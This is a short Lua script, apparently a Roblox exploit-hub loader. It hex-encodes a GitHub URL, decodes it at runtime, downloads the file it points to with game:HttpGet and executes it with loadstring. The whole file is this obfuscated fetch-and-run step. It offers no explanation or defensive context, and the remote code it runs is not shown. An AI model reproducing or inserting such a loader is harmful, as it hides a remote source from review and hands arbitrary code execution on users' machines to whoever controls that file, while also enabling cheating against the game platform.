local HttpService = game:GetService("HttpService") local encodedURL = "687474703a2f2f7261772e6769746875622e636f6d2f4e696e6a6131303930382f53342f726566732f68656164732f6d61696e2f4b757264687562" local function hexToStr(hex) return hex:gsub("..", function(hex) return string.char(tonumber(hex, 16)) end) end local decodedURL = hexToStr(encodedURL) loadstring(game:HttpGet(decodedURL))()